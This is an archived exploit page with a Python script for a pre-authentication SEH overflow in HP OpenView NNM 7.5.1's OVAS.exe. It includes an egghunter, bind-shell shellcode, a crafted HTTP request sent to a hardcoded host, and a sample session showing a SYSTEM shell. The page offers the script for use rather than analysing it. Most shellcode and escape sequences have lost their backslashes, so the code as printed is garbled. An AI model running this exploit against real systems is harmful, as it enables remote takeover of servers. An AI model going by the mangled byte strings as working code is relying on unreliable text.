HP OpenView NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HP OpenView NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit
# Published : 2008-04-02
# Author : muts
# Previous Title : Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta)
# Next Title : Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit
#!/usr/bin/python
################################################################################
# HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow
# Tested on Windows 2003 Server SP1.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/hp-nnm-ov.py.txt
# [shameless plug]
# This vulnerability was found, analysed and exploited
# as part of a training module in "BackTrack to the Max".
# http://www.offensive-security.com/ilt.php
# [/shameless plug]
#################################################################################
# bt 0day# python hp-nnm-ov.py
# [*] HP NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil HTTP request to NNMz, ph33r
# [*] Egghunter working ...
# [*] Check payload results - may take up to a minute.
# bt 0day# nc -v 192.168.1.111 4444
# (muts) [192.168.1.111] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:>whoami
# whoami
# nt authoritysystem
#
# C:>
#
################################################################################
# Insane, "We own all those registers, but how the heck do we get EIP"  method.
################################################################################
# crash = "T"*1300
#
#################################################################################
# Funky, "Lets make the stack happy and pray for EIP" overwrite method.
#################################################################################
# Case  1 - Stack not happy:
# crash = "T"*989
#
# Case 2 - Stack happy, we own EIP - blessed by the angels above:
# 0x44442638 - Happy NNM address
# crash = "T"*941 +"x38x26x44x44"+"x42x42x42x42" +"T"*12 +"x41x41x41x41" + "T"*24+":7510"+"x41x41x41x41" + "B"*24+":7510"
# 12 bytes of nasty strict alphanum shellcode possibility @EBP
#
################################################################################
# Unknown "wtf, these bytes are expanding" SEH method:
################################################################################
# 0x6d356c6e - POP POP RET somewhere in NNM
# crash = "xeb"*1100+"A"*9+"x41x41x41x41"+"A"*1900+":7510"
#
################################################################################
# Final exploit crash SEH method:
################################################################################
# crash = "xeb"*1101 +"x41x41x41x41x77x21x6ex6cx35x6d" + "G"*32 + egghunter +"A"*100+":7510"
#
################################################################################

import socket
import os
import sys

print "[*] HP NNM 7.5.1 OVAS.exe SEH Overflow Exploit (0day)"
print "[*] http://www.offensive-security.com"

# Alphanumeric egghunter shellcode + restricted chars x40x3fx3ax2f - ph33r
# One egg to rule them all.

egghunter=(
"%JMNU%521*TX-1MUU-1KUU-5QUUPAA%J"
"MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5"
"21*-q!au-q!au-oGSePAA%JMNU%521*-D"
"A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1"
"z1E-oRHEPAA%JMNU%521*-3s1--331--^"
"TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA"
"A%JMNU%521*-R222-1111-nZJ2PAA%JMN"
"U%521*-1-wD-1-wD-8$GwP")

alignstack="x90"*34+"x83xc4x03"

# win32_bind - EXITFUNC=thread LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
# Spawned shell dies quickly as a result of a parent thread killing it.
# Best shellcodes are of the "instant" type, such as adduser, etc.

bindshell=("T00WT00W" + alignstack +
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"
"x4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx48"
"x4ex46x46x32x46x42x4bx48x45x54x4ex33x4bx38x4ex37"
"x45x30x4ax37x41x30x4fx4ex4bx38x4fx54x4ax41x4bx48"
"x4fx35x42x32x41x50x4bx4ex49x34x4bx58x46x43x4bx58"
"x41x30x50x4ex41x33x42x4cx49x49x4ex4ax46x48x42x4c"
"x46x47x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x4ax32x45x37x45x4ex4bx48"
"x4fx35x46x52x41x30x4bx4ex48x46x4bx58x4ex30x4bx54"
"x4bx58x4fx35x4ex51x41x50x4bx4ex43x50x4ex32x4bx38"
"x49x58x4ex46x46x52x4ex31x41x56x43x4cx41x53x4bx4d"
"x46x46x4bx58x43x44x42x33x4bx38x42x54x4ex30x4bx48"
"x42x47x4ex51x4dx4ax4bx48x42x34x4ax50x50x35x4ax36"
"x50x38x50x54x50x50x4ex4ex42x35x4fx4fx48x4dx48x56"
"x43x55x48x56x4ax46x43x53x44x43x4ax36x47x57x43x57"
"x44x33x4fx35x46x55x4fx4fx42x4dx4ax56x4bx4cx4dx4e"
"x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx45x49x38x45x4e"
"x48x56x41x38x4dx4ex4ax50x44x30x45x45x4cx46x44x30"
"x4fx4fx42x4dx4ax46x49x4dx49x50x45x4fx4dx4ax47x55"
"x4fx4fx48x4dx43x55x43x55x43x55x43x55x43x45x43x44"
"x43x35x43x54x43x55x4fx4fx42x4dx48x36x4ax46x41x31"
"x4ex55x48x46x43x55x49x58x41x4ex45x59x4ax56x46x4a"
"x4cx51x42x37x47x4cx47x35x4fx4fx48x4dx4cx56x42x51"
"x41x35x45x45x4fx4fx42x4dx4ax56x46x4ax4dx4ax50x32"
"x49x4ex47x35x4fx4fx48x4dx43x35x45x35x4fx4fx42x4d"
"x4ax56x45x4ex49x34x48x48x49x44x47x45x4fx4fx48x4d"
"x42x55x46x55x46x35x45x45x4fx4fx42x4dx43x59x4ax46"
"x47x4ex49x57x48x4cx49x37x47x55x4fx4fx48x4dx45x45"
"x4fx4fx42x4dx48x56x4cx56x46x56x48x46x4ax46x43x56"
"x4dx36x49x58x45x4ex4cx56x42x45x49x45x49x42x4ex4c"
"x49x38x47x4ex4cx36x46x44x49x38x44x4ex41x33x42x4c"
"x43x4fx4cx4ax50x4fx44x54x4dx52x50x4fx44x44x4ex32"
"x43x39x4dx38x4cx37x4ax43x4bx4ax4bx4ax4bx4ax4ax46"
"x44x57x50x4fx43x4bx48x41x4fx4fx45x57x46x44x4fx4f"
"x48x4dx4bx35x47x45x44x55x41x55x41x55x41x35x4cx56"
"x41x50x41x55x41x45x45x35x41x45x4fx4fx42x4dx4ax56"
"x4dx4ax49x4dx45x30x50x4cx43x35x4fx4fx48x4dx4cx36"
"x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx38x47x55x4ex4f"
"x43x48x46x4cx46x56x4fx4fx48x4dx44x55x4fx4fx42x4d"
"x4ax56x4fx4ex50x4cx42x4ex42x56x43x35x4fx4fx48x4d"
"x4fx4fx42x4dx5a")

# 0x6d356c6e pop pot ret somehwere in NNM 7.5.1

evilcrash = "xeb"*1101 + "x41x41x41x41x77x21x6ex6cx35x6d" + "G"*32 +egghunter + "A"*100 + ":7510"

buffer="GET http://" + evilcrash+ "/topology/homeBaseView HTTP/1.1rn"
buffer+="Content-Type: application/x-www-form-urlencodedrn"
buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03rn"
buffer+="Content-Length: 1048580rnrn"
buffer+= bindshell 

print "[*] Sending evil HTTP request to NNMz, ph33r"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("192.168.1.111", 7510))
expl.send(buffer)
expl.close()
print "[*] Egghunter working ..."
print "[*] Check payload results - may take up to a minute."

# www.Syue.com [2008-04-02]